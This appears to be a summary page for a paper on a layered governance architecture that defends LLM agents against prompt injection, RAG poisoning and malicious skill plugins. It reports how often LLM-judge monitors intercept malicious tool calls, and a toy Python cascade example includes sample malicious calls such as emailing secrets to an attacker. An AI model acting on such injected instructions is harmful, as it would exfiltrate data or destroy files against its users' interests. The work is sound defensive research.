Governance Architecture for Autonomous Agent Systems: Threats, Framework, and Engineering Practice

Yuxu Ge

TL;DR

This paper proposes the Layered Governance Architecture (LGA), a four-layer framework comprising execution sandboxing, intent verification, zero-trust inter-agent authorization, and immutable audit logging. Generalization to the external InjecAgent benchmark yields 99-100% interception, indicating robustness beyond the authors' synthetic data.

Abstract

Autonomous agents powered by large language models introduce a class of execution-layer vulnerabilities -- prompt injection, retrieval poisoning, and uncontrolled tool invocation -- that existing guardrails fail to address systematically. In this work, we propose the Layered Governance Architecture (LGA), a four-layer framework comprising execution sandboxing (L1), intent verification (L2), zero-trust inter-agent authorization (L3), and immutable audit logging (L4). To evaluate LGA, we construct a bilingual benchmark (Chinese original, English via machine translation) of 1,081 tool-call samples -- covering prompt injection, RAG poisoning, and malicious skill plugins -- and apply it to OpenClaw, a representative open-source agent framework. Experimental results on Layer 2 intent verification with four local LLM judges (Qwen3.5-4B, Llama-3.1-8B, Qwen3.5-9B, Qwen2.5-14B) and one cloud judge (GPT-4o-mini) show that all five LLM judges intercept 93.0-98.5% of TC1/TC2 malicious tool calls, while lightweight NLI baselines remain below 10%. TC3 (malicious skill plugins) proves harder at 75-94% IR among judges with meaningful precision-recall balance, motivating complementary enforcement at Layers 1 and 3. Qwen2.5-14B achieves the best local balance (98% IR, approximately 10-20% FPR); a two-stage cascade (Qwen3.5-9B->GPT-4o-mini) achieves 91.9-92.6% IR with 1.9-6.7% FPR; a fully local cascade (Qwen3.5-9B->Qwen2.5-14B) achieves 94.7-95.6% IR with 6.0-9.7% FPR for data-sovereign deployments. An end-to-end pipeline evaluation (n=100) demonstrates that all four layers operate in concert with 96% IR and a total P50 latency of approximately 980 ms, of which the non-judge layers contribute only approximately 18 ms. Generalization to the external InjecAgent benchmark yields 99-100% interception, confirming robustness beyond our synthetic data.
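The abstract reports interception rate (IR) and false positive rate (FPR) for single judges and for two-stage cascades. The sketch below illustrates how those two metrics could be computed and how a cascade might combine two judges. It is a minimal illustration under stated assumptions, not the paper's implementation: the escalation rule (block only when both stages flag a call), the keyword-based stand-in judges, the sample tool calls, and all function names are hypothetical.

```python
from typing import Callable, Iterable, List, Tuple

# A judge maps a tool-call string to True (flag as malicious) or False (allow).
Judge = Callable[[str], bool]


def cascade(first: Judge, second: Judge) -> Judge:
    """Two-stage cascade (assumed rule): block only if both stages flag the call."""
    def judge(tool_call: str) -> bool:
        if not first(tool_call):
            return False            # stage 1 allows: no escalation
        return second(tool_call)    # stage 1 flags: stage 2 confirms or clears
    return judge


def interception_and_fpr(
    judge: Judge, samples: Iterable[Tuple[str, bool]]
) -> Tuple[float, float]:
    """Return (IR, FPR): the fraction of malicious calls flagged and the
    fraction of benign calls flagged. Needs at least one sample of each kind."""
    labelled: List[Tuple[str, bool]] = list(samples)
    malicious = [call for call, is_malicious in labelled if is_malicious]
    benign = [call for call, is_malicious in labelled if not is_malicious]
    ir = sum(judge(call) for call in malicious) / len(malicious)
    fpr = sum(judge(call) for call in benign) / len(benign)
    return ir, fpr


# Hypothetical toy data: (tool call, is_malicious).
samples = [
    ("send_email(to='attacker@example.com', body=secrets)", True),
    ("delete_files(path='/')", True),
    ("read_file(path='notes.txt')", False),
    ("send_email(to='team@example.com', body='agenda')", False),
]

# Keyword stand-ins for LLM judges: stage 1 is broad, stage 2 is stricter.
def stage1(call: str) -> bool:
    return "send_email" in call or "delete" in call

def stage2(call: str) -> bool:
    return "attacker" in call or "delete" in call

single = interception_and_fpr(stage1, samples)
combined = interception_and_fpr(cascade(stage1, stage2), samples)
```

On this toy data the broad first stage alone flags one of the two benign calls, while the cascade clears it. Under the assumed rule a cascade can only lower FPR relative to its first stage, and it can also lower IR whenever the second stage misses an attack the first stage caught, which is the trade-off the reported cascade figures reflect.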

Paper Structure (47 sections, 2 equations, 2 figures, 10 tables)

Introduction
Related Work
LLM Code Generation and Abstraction Failures
Prompt Injection and Agent Security
Agent Frameworks
Agent Security Benchmarks
LLM Safety and Guardrail Systems
From Defect Remediation to System Governance
Threat Model for Multi-Agent Systems
System Model
Attacker Model
Threat Class 1: Agency Abuse via Prompt Injection
Threat Class 2: RAG Data Poisoning
Threat Class 3: Malicious Skill Plugins
Layered Governance Architecture (LGA)
...and 32 more sections

Figures (2)

Figure 1: Layered Governance Architecture (LGA). Arrows indicate the verification and authorization flow; each layer is independently deployable.
Figure 2: Interception rate by attack subtype (TC1/TC2 only) on the Chinese dataset. On this dataset, all LLM judges achieve $\geq$92% across all attack types, while BART-MNLI remains below 18% (some English values fall slightly below 92%; see Table \ref{tab:security}). Baseline (0%) and mDeBERTa-NLI (0%) are omitted for clarity.

Theorems & Definitions (3)

Definition 4.1: Prompt Injection Attack
Definition 4.2: RAG Poisoning Attack
Definition 4.3: Malicious Skill Plugin Attack
